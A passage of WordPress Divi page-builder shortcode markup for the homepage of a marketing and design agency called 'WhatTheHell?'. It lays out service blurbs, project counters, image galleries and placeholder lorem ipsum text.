animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" 